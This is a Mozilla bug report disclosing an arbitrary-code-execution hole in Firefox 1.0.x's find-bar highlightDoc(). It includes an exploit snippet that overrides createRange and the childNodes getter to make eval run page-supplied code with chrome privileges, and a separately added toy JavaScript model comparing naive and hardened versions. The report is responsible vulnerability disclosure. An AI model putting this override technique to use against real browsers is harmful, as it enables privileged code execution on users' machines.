security hole in highlightDoc()

RESOLVED DUPLICATE of bug 289074


People: Reporter: moz_bug_r_a4, Assigned: dveditz

Firefox Tracking Flags: (Not tracked)

Whiteboard: [sg:dupe 289074]

Attachments: 1 attachment

Description (Reporter, 14 years ago)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2

Vulnerability: arbitrary code execution

Vulnerable code:
from highlightDoc() in findBar.js

win = window._content;
var doc = win.document;
var body = doc.body;
var count = body.childNodes.length;
endPt = doc.createRange();
endPt.setStart(body, count);


Exploit:
Web pages can overwrite the getter and the method, as in the following.
The usage of |eval| is similar to bug 289074.

  eval.setStart = eval.call;
  eval.__proto__ = document.createRange();

  document.createRange = function() {
    return eval;
  };

  document.body.__defineGetter__('childNodes', function() {
    return { length : MALICIOUS_CODE };
  });


I have confirmed that the following testcase works in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404 Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404 Firefox/1.0+


Reproducible: Always

Steps to Reproduce:
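The trust-boundary mistake behind this report, modelled in plain JavaScript as an added example (this is not Firefox or findBar.js code; the Toy* classes, the captured-native references and the page script are constructed for the demonstration): a privileged caller that dispatches through properties of page-controlled objects runs whatever the page installed, while a caller that reaches the original implementations, the way XPCNativeWrapper does, and validates the count does not.

```javascript
// Added example (not Firefox code): a toy DOM modelling the trust boundary
// in highlightDoc(). Privileged code dispatches through properties of
// objects that untrusted page script can redefine; the hardened version
// reaches the original implementations the way a native wrapper does.

class ToyRange { setStart(node, offset) { this.start = [node, offset]; } }
class ToyDocument { createRange() { return new ToyRange(); } }
class ToyBody {
  constructor(n) { this.kids = new Array(n).fill(null); }
  get childNodes() { return this.kids; }
}

// Captured before any untrusted script runs, as a native wrapper would hold them.
const nativeCreateRange = ToyDocument.prototype.createRange;
const nativeChildNodes = Object.getOwnPropertyDescriptor(ToyBody.prototype, 'childNodes').get;

// Naive version: mirrors the findBar.js snippet and trusts every property lookup.
function highlightDocNaive(doc, body) {
  const count = body.childNodes.length;
  const endPt = doc.createRange();
  endPt.setStart(body, count);
  return endPt;
}

// Hardened version: bypass expando properties and getters installed by the
// page, and refuse a count that is not a plain non-negative integer.
function highlightDocHardened(doc, body) {
  const count = Reflect.apply(nativeChildNodes, body, []).length;
  if (!Number.isInteger(count) || count < 0) throw new TypeError('bad childNodes.length');
  const endPt = Reflect.apply(nativeCreateRange, doc, []);
  if (!(endPt instanceof ToyRange)) throw new TypeError('createRange() did not return a Range');
  Reflect.apply(ToyRange.prototype.setStart, endPt, [body, count]);
  return endPt;
}

// Constructed "page script": the same two overrides as the report, but the
// payload is only a log entry so the demonstration stays benign.
function untrustedPageScript(doc, body, log) {
  doc.createRange = () => ({ setStart: (n, arg) => log.push(`page setStart ran with ${arg}`) });
  Object.defineProperty(body, 'childNodes', { get: () => ({ length: 'NOT_A_NUMBER' }) });
}

function demo() {
  const doc = new ToyDocument(), body = new ToyBody(3), log = [];
  untrustedPageScript(doc, body, log);
  highlightDocNaive(doc, body);            // page-installed code ran in the caller's context
  const hardened = highlightDocHardened(doc, body);
  return { naiveLog: log.slice(), hardenedStart: hardened.start };
}
```

In the real bug the naive caller is chrome-privileged and the page-installed setStart is eval.call, so the string handed over as the count is evaluated with chrome privileges.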
Comment 1 (Reporter, 14 years ago)
Created attachment 179680 [details]: testcase
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated (Assignee, 14 years ago): Blocks: 256195
Updated (14 years ago): Flags: blocking-aviary1.0.3?
Updated (14 years ago): Blocks: 289187

Same eval problem as reported in bug 289074.

*** This bug has been marked as a duplicate of 289074 ***
No longer blocks: 289187
Status: NEW → RESOLVED
Last Resolved: 14 years ago
Resolution: --- → DUPLICATE
Updated (Assignee, 14 years ago): Whiteboard: [sg:dupe 289074]
Updated (14 years ago): Flags: blocking-aviary1.0.3?
Updated (Assignee, 14 years ago): Group: security
Updated (Assignee, 14 years ago): Blocks: 256197
Updated (Assignee, 14 years ago): No longer blocks: 256195